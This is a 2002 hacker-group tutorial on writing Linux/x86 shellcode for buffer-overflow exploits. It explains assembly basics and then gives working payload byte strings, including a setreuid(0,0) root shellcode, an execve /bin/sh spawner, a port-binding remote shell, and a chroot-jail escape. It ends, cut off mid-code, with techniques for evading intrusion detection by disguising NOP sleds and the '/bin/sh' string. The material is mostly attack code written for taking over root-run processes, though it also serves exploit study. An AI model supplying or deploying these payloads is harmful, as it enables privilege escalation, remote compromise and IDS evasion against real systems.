UNF && pr1 present: Writing Linux/x86 shellcodes for dum dums. ----------------------------------------------------------------------------------------------- Copyright (c) February 2002, Sebastian Hegenbart (a.k.a pr1) and UNF (United Net Frontier) The following material is property of UNF && pr1. Do not redistribute this article modified and give proper credit to UNF and pr1 if you redistribute it or if you write your own article based upon the following material. ----------------------------------------------------------------------------------------------- 1. Introduction There are quite a few good texts about writing shellcodes out there. Unfortunately some of them require a lot of assembler knowledge. In this text I'll try to introduce you in Linux/x86 assembler as well as writing shellcode for Linux/x86. This introduction to ASM won't be complete though. I will just cover some important parts in writing shellcode. And try to do a good job in explaining the used codes. Nothing can replace a good ASM book or respectively a disassembler ;) 1.2. What is shellcode? Shellcode simply is a bunch of CPU instructions. It's called shellcode because the first shellcodes did simply spawn a shell. This term is obsolete actually ;) because there are remote shellcodes (UDP as well as TCP), chroot breaking codes, codes that attach a line to a file, setreuid codes and much more ... I'm going to call it shellcode throughout the text because everybody does. 1.3. What do we need shellcode for? After taking over a process (hopefully suid|sgid|deamon run by root...) we usually want it to do something usefull. There are lots of techniques like return into libc,GOT overwrite addys,PLT infection,exploiting .dtors ... If you can't get any other function doing your mighy work ( overwriting func pointers, ... ) you maybe want to use a shellcode. Simply overwrite %eip with some buffer address, jump back into a bunch of NOPs and your CPU will fetch instructions from the overwritten %eip forth. If you did a good job in writing this exploit your input buffer will be filled with shellcode somewhere. If %eip reaches the start of your shellcode it will be executed and you win! 1.4 How do I write shellcode? Ok let's start the main part of this article. I assume that you have at least some C knowledge. =-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-= 2. Assembler: Asm is a low level programming language. It's so damn low level that your able to set some transistors in your CPU. A IA-32 CPU works with several registers. Accessing those registers is much faster than accessing memory directly. You tell your program what do you via filling those registers with values. The most important registers to know are: %eax,%ebx,%ecx,%edx,%esp,%esi,%eip,%edi All registers of a 32 bit CPU are 4 bytes long. These names might sound like there was some uncreative developer doing his work but that's wrong: # %eax is the accumulator register after switching to kernel mode (int $0x80) the kernel checks for the Syscall number (every function provided by our kernel has its own syscall number). Look for this numbers in /usr/include/asm/unistd.h. # %ebx is the base register. Our first argument to a function should be placed inside this register. # %ecx the second argument. # %edx the third. # %esp is the stack frame pointer and points to the top of the current stack frame. # %ebp is the stack base pointer it points to the bottom of the current stack frame. # %eip is the instruction pointer (our best friend in relation with buffer overflows) Note that there does not exist an instruction to modify these register (beside of a jmp). # %eip and %edi are the segment registers (use them to store user data in your shellcode) 2.1 Modifying register: There are a lot of commands dealing with modification of registers. You can modify a byte, a word or the whole register. This is done with a suffix appended to an instruction. e.g.: movl,movb,movw (long,byte,word) # mov ... the mov instruction helps you to move something into a register (an addy,some number, another register's content...). In AT&T syntax (the syntax I'm using troughout the text) the destination is the second, the source the first register. # inc,dec ... increments or decrements the content of a register # sub,add ... adds/subtracts something to/from the content of a register # xor ... This is a bit operation (beside not,or,and,xor and the negations). Xor plays a special role when dealing with shellcodes. some basic explanation of the xor operation is due yet: xoring 1 with 0 is: 1, 0 with 0 is: 0, 1 with 1 is: 0 thus xor 4,4 is 0 (100 xor 100 == 000); Note: xor is returning the difference between two numbers and is also used to determine the hamming distance of a code. This is used in coding theory and encryption. # leal ... (stands for load effective address long) with this instruction you can load a memory address into a register # int $0x80 thats an interrupt. To keep it simple it just switches to kernel mode and lets the kernel execute our function. # push,pop ... load or save something from|on the stack Note: You can access the lower or higher byte of the lower word of a register (%al,%ah), the lower word of a register (%ax) or the whole (extended) register (%eax). There is no way to access the higher word of a register. Registers can be accessed byte-wise (%al,%bh,...), word-wise (%ax,%bx,...) and a whole (%eax,%ebx,...) Prepared with this knowledge we can start writing some asm code and later some shellcode. Let's start with a Hello, world ;) (there was no way avoiding it) .data message: .string "Hello, world\n" .globl main main: # write(int fd,char *message,ssize_t size); movl $0x4,%eax # Syscall number 4 from /usr/include/asm/unistd.h into %eax movl $0x1,%ebx # The standart output file descriptor (stdout) movl $message,%ecx # the addy of our message into %ecx movl $0xc,%edx # the length ouf our message #exit(int returncode); movl $0x1,%eax # Syscall number 1 xorl %ebx,%ebx # set %ebx zero inr $0x80 Note: This piece of code wouldn't work as shellcode for two reasons: 1. It's not address independent ( due to declaration of a .data field ) 2. It's containing zeros which terminate usuall string operating functions. Don't panic! I'll explain the whole procedure of making the shellcode now ;) =-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-=-=-==-=-= 3. Writing shellcode: 3.1 Setreuid shellcode: We will start with a small and easy piece, a setreuid(0,0) shellcode. We need a setreuid or a seteuid shellcode if the program droppes privileges before the vulnerable function executes ( usually with a seteuid(getuid()) ). The C program would look like: #include main(void) { setreuid(0,0); exit(0); } 080483b0
: 80483b0: b8 46 00 00 00 movl $0x46,%eax 80483b5: bb 00 00 00 00 movl $0x0,%ebx 80483ba: b9 00 00 00 00 movl $0x0,%ecx 80483bf: cd 80 int $0x80 80483c1: 8d 76 00 lea 0x0(%esi),%esi 80483c4: 90 nop 80483c5: 90 nop 80483c6: 90 nop 80483c7: 90 nop 80483c8: 90 nop 80483c9: 90 nop 80483ca: 90 nop 80483cb: 90 nop 80483cc: 90 nop 80483cd: 90 nop 80483ce: 90 nop 80483cf: 90 nop That's the whole main function generated by our compiler. But we only need the setreuid piece: 80483b0: b8 46 00 00 00 movl $0x46,%eax 80483b5: bb 00 00 00 00 movl $0x0,%ebx 80483ba: b9 00 00 00 00 movl $0x0,%ecx 80483bf: cd 80 int $0x80 Thus the setreuid shellcode would be: "\xb8\x46\x00\x00\x00" "\xbb\x00\x00\x00\x00" "\xb9\x00\x00\x00\x00" "\xcd\x80" If you go through this shellcode you will notice that there are more NULL bytes ( \x00 ) than instructions in this code. Unfortunately we can't use any NULL containing shellcodes. That's because most of the time we will be exploiting C programs. But there is no datatype string in C. There is only a 1 byte (char *) pointer pointing to a byte in memory. A NULL represents the end of the string. String operating functions like strcpy,strcat will stop copying the string after reaching the first NULL because they think they have reached its end which is indicated via NULL. Thus only "\xb8\x46\" from our setreuid shellcode would be copied when trying to exploit a program. What we have to do now is ro rewrite our assembly code in that there are no NULL - bytes in our shellcode left. As you can see this are the NULL containing functions: 80483b0: b8 46 00 00 00 movl $0x46,%eax 80483b5: bb 00 00 00 00 movl $0x0,%ebx 80483ba: b9 00 00 00 00 movl $0x0,%ecx We have to find equivalent instructions which do not produce any NULL - bytes: 80483b0: b8 46 00 00 00 movl $0x46,%eax This immediate function encodes into [opcode|destination][4 byte immediate value]. Because our immediate value is only 0x46 and the operation type long the other bytes remain unused. We substitued this with: 80483c6: 31 c0 xorl %eax,%eax 80483c8: b0 46 movb $0x46,%al The xorl sets %eax to zero. This is needed because we can't be sure that %eax is emtpy when we change the lower 8 bit. If %ah was filled with some value the kernel would execute the wrong syscall if we don't zero the register out in advance. The movb instruction encodes into [opcode|register][1 byte immediate value]. We can encode values up to 255 with 1 byte in 2-komplement. Again our logical equivalent NULL free setreuid piece: 80483b0: 31 c0 xorl %eax,%eax 80483b2: 31 db xorl %ebx,%ebx 80483b4: 31 c9 xorl %ecx,%ecx 80483b6: b0 46 movb $0x46,%al 80483b8: cd 80 int $0x80 And our working shellcode: "\x31\xc0" "\x31\xdb" "\x31\xdb" "\xb0\x46" "\xcd\x80" Beside of being NULL free a good shellcode should also be as small as possible. The smaller the shellcode the more NOPs can be placed in the exploit buffer thus increasing the chances of guessing the correct return address. 3.2 Making your shellcode portable: You will probably not now much about a remote system. Or you wont have enough privileges to find out a lot about the remote system. Or you maybe do not even have access to the remote system yet. A few reasons not to write shellcodes fitting only one system. Your shellcodes should be portable. Thus no absolute addressing may be used when writing shellcodes. Chances are minimal that your needed data will be at the correct address. Shellcodes should generally be written using relative addresses. e.g: we do not write: jmp 0x80483b8 instead we write: jmp $0x1a 3.3 Shell spawning shellcode: Spawning a shell in C looks like: #include main(void) { char *name[2]; name[0]="/bin/sh"; name[1]=NULL; execve(name[0],name,NULL); } As you can see, we need a character string ( "/bin/sh" ) to let execve know what we want to execute. But we have to fetch the address of "/bin/sh" somehow in a way we can refere to it relatively. If you have some knowledge about the Intel architecture and CPU architecture in generall you know that the memory location of the next instruction to be executed is stored in %eip often called pc or program counter. If a program calls a sub-function the address of the next instruction to be executed after the sub-function's return must be stored somewhere. Relating to some Risc CPUs this address can be stored in a register like: jal addy,reg /* jumps to addy and stores pc+4 in reg */ jr reg /* the return of our sub-function jumps to the addy stored in reg */ For our Intel Cisc: call sub_func /* jumps to sub_func and pushes %eip+4 onto the stack */ ret /* after stack was cleaned the function jumps to the saved address lying on the stack */ We can say that the address of the next instruction is pushed onto the stack by call. Thus we can apply a little trick: call some_offset /* call pushes the address of "/bin/sh" ( pc+4 ) onto the stack */ .string "/bin/sh" Note that the string "/bin/sh" lies in the .text ( or code ) segment. Our CPU can't execute "/bin/sh" thus we have to avoid that our CPU actually executes this piece of code. Let's look at a complete example of fetching an address and avoiding the execution of "/bin/sh". .globl main main: jmp to_call after_jmp: popl %esi /* addy is now in %esi */ /* exit */ xorl %eax,%eax incl %eax int $0x80 to_call: call offset .string "/bin/sh" We jmp to the call let call doing the work, call back, pop the address from the stack and exit. static char lnx_execve[]= "\xeb\x1d" // jmp 0x1d /* gather "/bin/sh" addy */ "\x5b" // popl %ebx /* poping "/bin/sh" addy */ "\x31\xc0" // xorl %eax,%eax "\x89\x5b\x08" // movl %ebx,0x8(%ebx) /* copy address into %ebx at offset 0x8 */ "\x88\x43\x07" // movb %al,0x7(%ebx) /* NULL terminate the string */ "\x89\x43\x0c" // movl %eax,0xc(%ebx) /* NULL terminate the arguments */ "\x8d\x4b\x08" // leal 0x8(%ebx),%ecx /* loads %ecx with "/bin/sh" addy */ "\x8d\x53\x0c" // leal 0xc(%ebx),%edx /* loads NULL into %edx */ "\xb0\x0b" // movb $0xb,%al /* execve syscall */ "\xcd\x80" // int $0x80 "\x31\xc0" // xorl %eax,%eax /* and exit to avoid an infinite loop */ "\x21\xd8" // andl %ebx,%eax "\x40" // incl %eax "\xcd\x80" // int $0x80 "\xe8\xde\xff\xff\xff" // call -0xde "/bin/sh"; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 4.0 More Advanced Shellcodes: Considering remote exploits we need other kinds of shellcodes. We can't just spawn a shell remotely. Thus our shellcode needs network capabilities. To bind a shell onto a port we can write: #include #include #include #include #include main(void) { char *exec[2]; int fd,fd2; struct sockaddr_in addy; addy.sin_addr.s_addr = INADDR_ANY; addy.sin_port = htons(1337); addy.sin_family = AF_INET; exec[0]="/bin/sh"; exec[1]="sh"; fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); bind(fd,&addy,sizeof(struct sockaddr_in)); listen(fd,1); fd2 = accept(fd,NULL,0); dup2(fd2,0); dup2(fd2,1); dup2(fd2,2); execl(exec[0],exec,NULL); } A quite easy task in C. Now let's try the same thing in assembler. 4.1. Socket Syscalls: Usually the syscall number is moved into %eax and the arguments into the following registers. After using the kernel interrupt our work is done. Functions exist with more arguments than registers to store your Arguments in thus simply store your arguments in user memory and save the address of this memory in a register. Refering to socket syscalls ( socket, bind, listen, accept,... ) it's slightly different. Every socket call has the syscall number 0x66. So how does the kernel know which syscall was meant? This is done via a subcode in %ebx. Some important subcodes are: socket() 1 bind() 2 listen() 4 accept() 5 Check for more. 4.2. Struct Sockaddr_in: We also have to take a look at struct sockaddr_in: struct sockaddr_in { uint8_t sin_len; /* length of the structure, this is 0x10 for AF_INET (ipv4). 2 byte */ sa_family_t sin_family; /* 2 byte containing AF_INET (defined as 2)*/ in_port_t sin_port; /* 2 byte with the TCP or UDP port number in network byte order */ struct in_addr sin_addr /* 4 byte, usually contains the servers addy but we want to bind * our own addy and thus zero it out (same as INADDR_ANY) */ char sin_zero[8]; /* should be zeroed out as well */ }; 4.3. Port binding shellcode: static char bind[]= /* socket(int domain, int type, int protocol); */ "\x31\xc0" // xorl %eax,%eax "\x89\x46\x10" // movl %eax, 0x10(%esi) /* 3rd Argument IPPROTO_TCP */ "\x40" // incl %eax "\x89\xc3" // movl %eax, %ebx "\x89\x46\x0c" // movl %eax, 0xc(%esi) /* 2nd Argument SOCK_STREAM */ "\x40" // incl %eax "\x89\x46\x08" // movl %eax, 0x8(%esi) /* 1st Argument AF_INET */ "\x8d\x4e\x08" // leal 0x8(%esi), %ecx "\xb0\x66" // movb $0x66, %al "\xcd\x80" // int $0x80 /* listen(int fd, int backlog); */ "\x43" // incl %ebx "\x88\x46\x04" // movb %al,0x4(%esi) /* save fd returned from socket */ "\x31\xc0" // xorl %eax,%eax "\xc6\x46\x0c\x10" // movb $0x10,0xc(%esi) /* sockaddr_in length */ "\x66\x89\x5e\x10" // movb %bx,0x10(%esi) /* AF_INET */ "\x89\x46\x14" // movl %eax,0x14(%esi) /* INADDR_ANY */ "\x89\xc2" // movl %eax,%edx "\xb0\x90" // movw $0x90,%al /* sin_port */ "\x66\x89\x46\x12" // movb %ax,0x12(%esi) "\x8d\x4e\x10" // leal 0x10(%esi),%ecx /* load structure int %ecx */ "\x89\x4e\x08" // movl %ecx,0x8(%esi) /* save struct at offset 0x8 */ "\x8d\x4e\x04" // leal 0x4(%esi),%ecx /* load struct together with fd into %ecx */ "\xb0\x66" // movb $0x66,%al "\xcd\x80" // int $0x80 /* bind(int fd, struct sockaddr_in *my_addy, socklen_t addrlen); */ "\x89\x5e\x08" // movl %ebx,0x8(%esi) "\x43" // incl %ebx "\x43" // incl %ebx "\xb0\x66" // movb $0x66,%al "\xcd\x80" // int $0x80 /* accept(int fd, struct sockaddr_in *addy, socklen_t *addrlen); */ "\x89\x56\x08" // movl %edx,0x8(%esi) /* addy is a NULL pointer */ "\x89\x56\x0c" // movl %edx,0xc(%esi) /* so is addrlen */ "\x43" // incl %ebx "\xb0\x66" // movb $0x66,%al "\xcd\x80" // int $0x80 /* dup2(int old, int new) */ "\x86\xc3" // xchg %al,%bl /* fd returned from accept is first arg */ "\x31\xc9" // xorl %ecx,%ecx /* stdin */ "\xb0\x3f" // movb $0x3f,%al "\xcd\x80" // int $0x80 "\x41" // incl %ecx /* stdout */ "\xb0\x3f" // movb $0x3f,%al "\xcd\x80" // int $0x80 "\x41" // incl %ecx /* stderr */ "\xb0\x3f" // movb $0x3f,%al "\xcd\x80" // int $0x80 /* execve(cons char *filename, char *const argv[], char *const envp[]); */ "\xeb\x1d" // jmp 0x1d /* gather "/bin/sh" addy */ "\x5b" // popl %ebx /* poping "/bin/sh" addy */ "\x31\xc0" // xorl %eax,%eax "\x89\x5b\x08" // movl %ebx,0x8(%ebx) /* copy address into %ebx at offset 0x8 */ "\x88\x43\x07" // movb %al,0x7(%ebx) /* NULL terminate the string */ "\x89\x43\x0c" // movl %eax,0xc(%ebx) /* NULL terminate the arguments */ "\x8d\x4b\x08" // leal 0x8(%ebx),%ecx /* loads %ecx with "/bin/sh" addy */ "\x8d\x53\x0c" // leal 0xc(%ebx),%edx "\xb0\x0b" // movb $0xb,%al /* execve syscall */ "\xcd\x80" // int $0x80 "\x31\xc0" // xorl %eax,%eax "\x21\xd8" // andl %ebx,%eax "\x40" // incl %eax "\xcd\x80" // int $0x80 "\xe8\xde\xff\xff\xff" // call -0xde "/bin/sh"; Note: This shellcode is quite bloated. It could be optimized further especially the execve part ( that's our original execve code ). I didn't optimize it further for better readability. It's only purpose is to show the principals of writing portbind shellcode. =-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-==-=-=-=-=-=-=-= 5. Chroot breaking shellcode: Note: On linux the chroot behaviour changed somewhere between kernel 2.4.6 and 2.4.13. This method works only on kernels <= 2.4.5. Sometimes deamons like ftps,httpd,... run in a so called change-root jail. This simply means that your home directory is changed to the path = "/" Hence your homedir is / (note that this is not the real root) you can't perform a cd .. and do mighty things with your account as well as your not able to spawn a shell because /home/pr1/bin/sh does not really exist ( if we consider /home/pr1 to be chrooted ). Unfortunately to computer security you can break this jail. This is a quite easy task: * create another directory * chroot this directory * do a chroot("../../../"); with many "../" Our chroot breaking C proggy: #include main(void) { mkdir("pr1",0755); chroot("pr1"); chroot("../../../../../../../../../../"); } Note: We create a directory called "sh" in assembler. We can use the string we need to execute the shell as our directory name. In that we can reduce our shellcodes size and simplify the code. ;) static char chroot[]= "\xeb\x4e" // jmp 0x4e /* mkdir(); */ "\x31\xc0" // xorl %eax,%eax "\x5e" // popl %esi /* addy of /bin/sh now in %esi */ "\x8d\x5e\x05" // leal 0x5(%esi),%ebx /* load addy of sh into %ebx */ "\x66\xb9\xed\x01" // movw $0x1ed,%cx /* that's the 0755 mode flag */ "\xb0\x27" // movb $0x27,%al /* mkdir syscall */ "\xcd\x80" // int $0x80 /* chroot(); */ "\x31\xc0" // xorl %eax,%eax "\xb0\x3d" // movb $0x3d,%al /* chroot syscall, sh still in %ebx */ "\xcd\x80" // int $0x80 /* chroot("../"); */ "\x31\xc0" // xorl %eax,%eax "\xbb\xd2\xd1\xd1\xff" // movl $0xffd0d1d1,%ebx "\xf7\xdb" // negl %ebx /* We put "../" into %ebx. * "../" encodes into "\x2e\x2e\x2f" intel is little endian and we thus have to put * "\x2f\x2e\x2e" into the register. Thus we put 0xffd0d1d1 into %ebx and perform a not * on this value. This results in our wished "\x2f\x2e\x2e". */ "\x31\xc9" // xorl %ecx,%ecx "\xb1\x10" // movb $0x10,%cl /* we loop for 16 times */ "\x56" // pushl %esi /* save "/bin/sh" string /* Set the segment register. We start at 0x10(%esi) */ "\x01\xce" // addl %ecx,%esi "\x89\x1e" // movl %ebx,(%esi) /* and write to pointed addy */ "\x83\xc6\x03" // addl %0x3,%esi /* increment segment register */ "\xe0\xf9" // loopne -0x7 "\x5e" // popl %esi /* restore "/bin/sh" string */ "\xb0\x3d" // movb $0x3d,%al /* chroot syscall */ "\x8d\x5e\x10" // leal 0x10(%esi),%ebx /* this is our evil ../../.. string */ "\xcd\x80" // int $0x80 /* execve */ "\x31\xc0" // xorl %eax,%eax "\x89\x76\x08" // movl %esi,0x8(%esi) "\x89\x46\x0c" // movl %eax,0xc(%esi) "\xb0\x0b" // movb $0xb,%al "\x89\xf3" // movl %esi,%ebx "\x8d\x4e\x08" // leal 0x8(%esi),%ecx "\x8d\x56\x0c" // leal 0xc(%esi),%edx "\xcd\x80" // int $0x80 /* exit */ "\x31\xc0" // xorl %eax,%eax "\x21\xd8" // andl %ebx,%eax "\x40" // incl %eax "\xcd\x80" // int $0x80 "\xe8\xad\xff\xff\xff" // call -0xad "/bin/sh"; Note: This "not" trick is from TaeHo's chroot shellcode. =-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-==-=-=-=-=-=-= 6. IDS-evasive Codes: Simple Intrusion Decections Systems try identify an exploit attempt via counting numbers of NOP or NOP like instructions in received packets. ( if you do not know what a NOP is: it's an instruction that does nothing at all, this is used in exploits to maximize chances of guessing correct buffer addresses. If you hit a nop the code will proceed until it reaches your mighty shellcode. ) This techniques can be fooled however: One of the first ideas to fool this were to use a 1 byte jump: \x90 ( nop ) is substituted with "\xeb\x01" ( jmp 0x1 ) Another way is to use other nop-like instructions like incl %eax,incl %ebx,incl %ecx,incl %edx: coded as: \x40,\x43,\x41,\x42 You can of course mix them up as well. Another nice way would be something like: movl $0x41414141,%eax coded as: \xb8\x41\x41\x41\x41 Let's say you hint into a \x41 -> the cpu will increment %ecx until it reaches the \xb8 further on %eax will be loaded with 0x41414141 You could mix this instruction with a movl $0x43434343,%ebx coded as: \xbb\x43\x43\x43\x43 this would have the same result. 6.1. Hiding the "/bin/sh" string: Another way of identifying an exploit attempt might be searching for a string like "/bin/sh". This technique is also applieable for let's say an imapd exploit. Or generally a program that casts all lowercase characters into uppercase: #include main(int argc,char *argv[]) { char buf[512]; int i; for(i=0;i